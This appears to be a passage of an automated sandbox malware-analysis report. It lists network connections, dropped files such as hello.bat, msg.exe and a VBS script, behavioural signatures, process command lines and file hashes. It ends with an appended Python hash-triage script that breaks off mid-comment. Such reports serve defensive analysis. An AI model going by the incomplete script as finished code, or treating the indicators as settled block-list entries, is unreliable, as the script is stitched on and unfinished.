| DK | 77.243.51.121:443 | uipglob.semasio.net | tcp |
| US | 8.8.8.8:53 | cms.quantserve.com | udp |
| DE | 91.228.74.159:443 | cms.quantserve.com | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| US | 8.8.8.8:53 | cs.media.net | udp |
| GB | 23.39.224.21:443 | cs.media.net | tcp |
| US | 8.8.8.8:53 | csync.loopme.me | udp |
| NL | 35.214.132.64:443 | csync.loopme.me | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| US | 151.101.65.108:443 | acdn.adnxs-simple.com | tcp |
| US | 8.8.8.8:53 | sync.srv.stackadapt.com | udp |
| US | 54.157.210.240:443 | sync.srv.stackadapt.com | tcp |
| US | 151.101.65.108:443 | acdn.adnxs-simple.com | tcp |
| US | 8.8.8.8:53 | ads.pubmatic.com | udp |
| US | 8.8.8.8:53 | js-sec.indexww.com | udp |
| GB | 23.219.196.188:443 | ads.pubmatic.com | tcp |
| US | 104.18.38.76:443 | js-sec.indexww.com | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| NL | 89.207.16.204:443 | prebid-match.dotomi.com | tcp |
| US | 35.186.253.211:443 | rtb.openx.net | tcp |
| DK | 37.157.2.228:443 | c1.adform.net | tcp |
| US | 8.8.8.8:53 | sync.connectad.io | udp |
| US | 8.8.8.8:53 | eb2.3lift.com | udp |
| NL | 35.214.136.108:443 | x.bidswitch.net | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | s.amazon-adsystem.com | udp |
| US | 98.82.157.231:443 | s.amazon-adsystem.com | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| US | 8.8.8.8:53 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 8.8.8.8:53 | sync-tm.everesttech.net | udp |
| NL | 35.214.132.64:443 | csync.loopme.me | tcp |
| US | 8.8.8.8:53 | cdn.indexww.com | udp |
| US | 8.8.8.8:53 | image6.pubmatic.com | udp |
| DE | 37.252.171.21:443 | secure.adnxs.com | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| US | 64.74.236.223:443 | sync.outbrain.com | tcp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| DK | 37.157.2.228:443 | c1.adform.net | tcp |
| US | 151.101.2.49:443 | sync-tm.everesttech.net | tcp |
| NL | 35.214.132.64:443 | csync.loopme.me | tcp |
| NL | 198.47.127.19:443 | image6.pubmatic.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 76.223.111.18:443 | eb2.3lift.com | tcp |
| US | 104.22.55.206:443 | sync.connectad.io | tcp |
| FR | 5.196.111.69:443 | ssbsync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | chip-cluster.de | udp |
| DE | 83.125.106.237:443 | chip-cluster.de | tcp |
| DE | 83.125.106.237:443 | chip-cluster.de | tcp |
| DE | 83.125.106.237:443 | chip-cluster.de | tcp |
| DE | 83.125.106.237:443 | chip-cluster.de | tcp |
| DE | 83.125.106.237:443 | chip-cluster.de | tcp |
| DE | 18.198.152.110:443 | sp.chip.de | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | www.chip.de | udp |
| GB | 2.16.247.162:443 | www.chip.de | tcp |
| US | 8.8.8.8:53 | securedl.cdn.chip.de | udp |
| DE | 2.19.11.98:443 | securedl.cdn.chip.de | tcp |
| US | 8.8.8.8:53 | www.trustedoffers.de | udp |
| NL | 185.158.249.69:443 | www.trustedoffers.de | tcp |
| US | 8.8.8.8:53 | api.chip-secured-download.de | udp |
| DE | 116.203.169.158:443 | api.chip-secured-download.de | tcp |
| DE | 116.203.169.158:443 | api.chip-secured-download.de | tcp |
| GB | 2.16.247.146:443 | www.chip.de | tcp |
| DE | 185.212.44.250:443 | www.trustedoffers.de | tcp |
| DE | 18.245.86.30:443 | tags.chip.de | tcp |
| US | 8.8.8.8:53 | videoplayer.chip.de | udp |
| CZ | 65.9.95.56:443 | videoplayer.chip.de | tcp |
| US | 8.8.8.8:53 | cdn.greenvideo.io | udp |
| US | 8.8.8.8:53 | media-video.chip.de | udp |
| GB | 2.16.247.162:443 | www.chip.de | tcp |
| NL | 18.65.39.35:443 | cdn.greenvideo.io | tcp |
| GB | 92.123.128.171:443 | media-video.chip.de | tcp |
| US | 8.8.8.8:53 | de.ioam.de | udp |
| NL | 18.65.39.35:443 | cdn.greenvideo.io | tcp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | static.chip-secured-download.de | udp |
| DE | 116.203.169.156:80 | static.chip-secured-download.de | tcp |
| NL | 108.156.60.2:443 | cmp.chip.de | tcp |
| US | 8.8.8.8:53 | embeds.greenvideo.io | udp |
| GB | 54.230.10.124:443 | embeds.greenvideo.io | tcp |
| US | 8.8.8.8:53 | benelph.de | udp |
| US | 104.26.8.83:443 | app.varify.io | tcp |
| DE | 136.243.25.11:443 | benelph.de | tcp |
| US | 8.8.8.8:53 | downloaderapi.chip.de | udp |
| US | 8.8.8.8:53 | api.trustedoffers.de | udp |
| NL | 185.158.249.69:443 | api.trustedoffers.de | tcp |
| US | 8.8.8.8:53 | media-api-prod.greenvideo.io | udp |
| NL | 18.238.243.2:443 | media-api-prod.greenvideo.io | tcp |
| DE | 91.215.100.78:443 | data-2f2ec12966.chip.de | tcp |
| DE | 91.215.100.39:443 | script.ioam.de | tcp |
| GB | 23.219.198.27:443 | ad.yieldlab.net | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 185.89.210.212:443 | ib.adnxs.com | tcp |
| GB | 23.219.198.27:443 | ad.yieldlab.net | tcp |
| GB | 2.16.247.166:443 | rtt.bf-tools.net | tcp |
| GB | 92.123.128.171:443 | media-video.chip.de | tcp |
| GB | 92.123.128.171:443 | media-video.chip.de | tcp |
| GB | 92.123.128.171:443 | media-video.chip.de | tcp |
| GB | 92.123.128.171:443 | media-video.chip.de | tcp |
| US | 8.8.8.8:53 | 5baf1288cf.dl8.me | udp |
| IE | 52.51.160.17:443 | 5baf1288cf.dl8.me | tcp |
| FR | 5.196.111.69:443 | ssbsync.smartadserver.com | tcp |
| NL | 89.207.16.204:443 | prebid-match.dotomi.com | tcp |
| US | 35.186.253.211:443 | rtb.openx.net | tcp |
| DK | 37.157.2.228:443 | c1.adform.net | tcp |
| NL | 35.214.136.108:443 | x.bidswitch.net | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| DE | 185.212.44.250:443 | api.trustedoffers.de | tcp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| NL | 198.47.127.18:443 | image8.pubmatic.com | tcp |
| DE | 217.79.187.69:443 | cm.adsafety.net | tcp |
| US | 8.8.8.8:53 | ad.360yield.com | udp |
| IE | 54.217.177.58:443 | ad.360yield.com | tcp |
| US | 13.107.246.64:443 | adsdkprod.azureedge.net | tcp |
| NL | 18.239.68.199:443 | aax.amazon-adsystem.com | tcp |
| IE | 34.241.186.48:443 | ups.xplosion.de | tcp |
| GB | 92.123.128.171:443 | media-video.chip.de | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| GB | 23.219.198.27:443 | ad.yieldlab.net | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| IE | 67.220.228.202:443 | aax-eu.amazon-adsystem.com | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| NL | 185.64.189.112:443 | hbopenbid.pubmatic.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| DE | 78.46.198.121:443 | chip.mycleverpush.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.26.15.31:443 | api.cleverpush.com | tcp |
| US | 104.26.14.31:443 | api.cleverpush.com | tcp |
| NL | 108.156.60.2:443 | cmp.chip.de | tcp |
| DE | 3.77.58.244:443 | crb.kargo.com | tcp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 64.74.236.95:443 | tr.outbrain.com | tcp |
| US | 64.74.236.95:443 | tr.outbrain.com | tcp |
| GB | 23.219.197.58:443 | libs.outbrain.com | tcp |
| US | 151.101.194.132:443 | mv.outbrain.com | tcp |
| DE | 18.198.134.217:443 | mds.bf-tools.net | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 52.223.40.198:443 | match.adsrvr.org | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 178.250.1.11:443 | gum.criteo.com | tcp |
| NL | 185.158.249.69:443 | api.trustedoffers.de | udp |
| NL | 185.158.249.69:443 | api.trustedoffers.de | tcp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| NL | 185.158.249.69:443 | api.trustedoffers.de | tcp |
| DE | 91.215.100.39:443 | script.ioam.de | tcp |
| GB | 142.250.179.227:443 | id.google.com | udp |
| NL | 185.158.249.69:443 | api.trustedoffers.de | tcp |
| GB | 172.217.16.238:443 | img.youtube.com | udp |
| GB | 172.217.16.238:443 | img.youtube.com | tcp |
| DE | 185.212.44.250:443 | api.trustedoffers.de | tcp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| DE | 185.212.44.250:443 | api.trustedoffers.de | tcp |
| DE | 185.212.44.250:443 | api.trustedoffers.de | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 216.58.212.206:443 | play.google.com | udp |
| GB | 216.58.201.106:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | udp |
| GB | 142.250.200.46:443 | img.youtube.com | udp |
| GB | 216.58.212.206:443 | play.google.com | udp |
| US | 8.8.8.8:53 | bonzibuddy.software.informer.com | udp |
| US | 104.22.16.194:443 | bonzibuddy.software.informer.com | tcp |
| US | 104.22.16.194:443 | bonzibuddy.software.informer.com | tcp |
| US | 8.8.8.8:53 | img.informer.com | udp |
| US | 8.8.8.8:53 | hits.informer.com | udp |
| US | 8.8.8.8:53 | i.informer.com | udp |
| US | 74.117.179.70:443 | img.informer.com | tcp |
| US | 74.117.179.70:443 | img.informer.com | tcp |
| US | 74.117.179.70:443 | img.informer.com | tcp |
| US | 74.117.179.70:443 | img.informer.com | tcp |
| US | 204.155.159.109:443 | hits.informer.com | tcp |
| US | 172.67.43.115:443 | i.informer.com | tcp |
| US | 172.67.43.115:443 | i.informer.com | tcp |
| US | 172.67.43.115:443 | i.informer.com | tcp |
| US | 172.67.43.115:443 | i.informer.com | tcp |
| US | 8.8.8.8:53 | software.informer.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.169.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
Files
memory/3700-52-0x0000000000400000-0x0000000000928000-memory.dmp
memory/3700-54-0x0000000000400000-0x0000000000928000-memory.dmp
memory/3472-55-0x0000000000400000-0x00000000005CC000-memory.dmp
memory/3472-56-0x0000000000400000-0x00000000005CC000-memory.dmp
memory/3260-57-0x0000000000400000-0x00000000005CC000-memory.dmp
memory/3260-58-0x0000000000400000-0x00000000005CC000-memory.dmp
\Users\Admin\AppData\Local\Temp\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\.ba1\wixstdba.dll
C:\Users\Admin\AppData\Local\Temp\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\.ba1\logo.png
memory/2152-140-0x0000000000400000-0x00000000005CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\957C.tmp\957D.tmp\957E.vbs
C:\Program Files (x86)\hello.bat
C:\Program Files (x86)\hello.jpg
C:\Program Files (x86)\launch.exe
C:\Program Files (x86)\date.txt
C:\Program Files (x86)\msg.exe
C:\Program Files (x86)\hello.reg
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-20 18:57
Reported
2024-10-20 19:28
Platform
win10v2004-20241007-en
Max time kernel
1800s
Max time network
1732s
Command Line
Signatures
Browser Information Discovery
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133739243295733374" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\All Numby_s Impact Presets.sfpreset"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffa028fcc40,0x7ffa028fcc4c,0x7ffa028fcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1996,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1988 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2076,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa028fcc40,0x7ffa028fcc4c,0x7ffa028fcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3216 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3232,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3256 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3752,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3764 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4864,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4876 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5000,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4992 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4656,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4916 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4508,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5124 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4448,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4496 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5252,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5204 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=860,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5448 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5496,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4816 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5592,i,8067410346073131589,13932136202333615859,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5580 /prefetch:1
Network
Files
| SHA512 | 34945ad9c4e41bb41a5c21c3278b1dad945188cbe84c5f74d2f495ed7b849c88696caa7d641bcbca1d3f8bc4043c1129e3cb3f83a2fbea59163f756596ccb2e9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d8d391c4344e7c8980ccba688dd24a94 |
| SHA1 | 506e44e4f254f537c0b4256ad4fefec21ed29a3a |
| SHA256 | 79b3adc0a05aa937b126e18e689ebeda7f3cabaf884482d6226cbb78060c55a4 |
| SHA512 | 71fa0174f1020d27cf71c6f039eb7f32fa7e2770c980b31e44be0b04f228de7e0ca27cb21f33642c9cb1dd1cf53a6ea5c6ce14272cf8f6e5860b1ad9ecc956eb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4ef0fcbb0fe1ab882982b904775758ac |
| SHA1 | 05e573e260c167d4be5706fc7c73a4b8f0055cef |
| SHA256 | 5da3f783f57e2450b2b81aa557dfcca85a7db20daddd162daf454a88c1502a50 |
| SHA512 | 08c51582595dfb2859d48da73fac60994d8ba288f54167c6425f8a5f444d485ca5636e97ca04874ebf9e4b056696cd4a179a1be92ba7ad418c9832bccd4e5dae |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a755009bdc0e655d82c03480b0e23168 |
| SHA1 | 123a6c610c064b3526a8f48e35ff047c1aa7e0f7 |
| SHA256 | 9b105fc22a33514cf468972733dc01ea99e3ff19e19d90663f16087228a9548e |
| SHA512 | 9887ac5b668a897d3b1548b3f332fbdafaedb7e61e9d5a16d5da6010724d9b102da6f874d0181e949aa2c0703d958e21dd4bc16beacb111032e9eb7b11b35a9c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4dea1bf6b3fa89cbab209245c40724bf |
| SHA1 | 0c00f895378ac3791a7bfda35dfcdd2eb93d9567 |
| SHA256 | 31d59f9fcdbbc3f3fbb2c70b97200e5c55092727925d099b8bcae201cc1ee6ba |
| SHA512 | c757b1ecf05b03a6d1e539bcbf484d82b758d802dc6392dc2cbf9b1ebbc0751065d3e5efc2212001f311d781a8b5cc38eb3376da57aab70f8bd6e8d863287d76 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 624b45708432a0cb76291b99650378a7 |
| SHA1 | 977d78b633705de0fcdbc58ed76f0bd21c5a28fb |
| SHA256 | 689dd29d766b712b0f285b814733cb867ace78bd4c3e61927958017aa9b79be1 |
| SHA512 | 4d90cc95734479c1139998182be3ac3ab8879dc92976aa5243d07f4021366e23599f2c967579cfc811ea912db906dd179deec9e6705eed644e3b12a95b49abde |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 365393d8c63a212d5b568a183281114a |
| SHA1 | c520257a13d91fbd24b6c96f42eaee427076b4e7 |
| SHA256 | 09263549d89d3b0c7048c8c289781df04582d680938fae4f2045bf0804308d2b |
| SHA512 | a0b8f4907b77c66ce3d79d11bcd9921baca18b3f6e8d4b5f39db1639a4390df98d6442ac1a8df3bf777960a3fdfff85ac0353d019c37d4f5880126247fe164be |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 92f2c33e84762aa54ad55d115e09ce2e |
| SHA1 | bb3b70113373b1456f1db5b50534f901334ac30d |
| SHA256 | 563238c498d48db7b4ba6a2fa68301e3bbae9df3396438d98f7572fdd9ed5408 |
| SHA512 | 4272578139697f71e6d9dcdab0b331ed246043c1f5008bd3bb8735b57ff276a65e54c5e091ecb9904c27b53e6ce34303473320529c5698ac3366afead12e5a0b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 53a765cd81896fdd8af47d830303cd46 |
| SHA1 | 78e67435b2b0a1d1bb8b7751d8ace5578f908a3b |
| SHA256 | f8fdf26022913c0fa8c77e79ab6a2bfab2c67b5c7c5a208a60db1f249b87fa42 |
| SHA512 | 6b4dfade5ea33ca0b367858179d5fe5922accf9a652a559eaf383143c62fc9d3536a889fd3ad5be69d2a8e891f32b8df67b344c36234d0d47e7af1df15cc6626 |
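The tables above list the same Chrome `Preferences` path many times with different digests, interleaved with GUID-named `.tmp` files in the same profile directory. Chrome rewrites its profile files through a temporary file that is then renamed whenever profile state changes, so these rows are browser churn from the detonation rather than payloads the sample dropped, and they should not go onto a block list as-is. The following is an added example, not part of the report: it parses the path-plus-table layout used above, checks that each digest has the right hex length, and separates browser-profile churn from hashes worth blocking. The sample input is three entries copied from the tables above; the churn heuristic (path under `Chrome\User Data` and not executable-looking) and the suffix list are this example's assumptions.

```python
"""Triage the dropped-file hash tables of a sandbox report (added example)."""
import re
from collections import Counter

# Expected hex length of each digest the report lists.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# One table row: "| SHA256 | <hex> |". Any other non-empty line is a path line.
ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]*)\s*\|$")

# Assumption of this example: files under a Chrome profile that do not look
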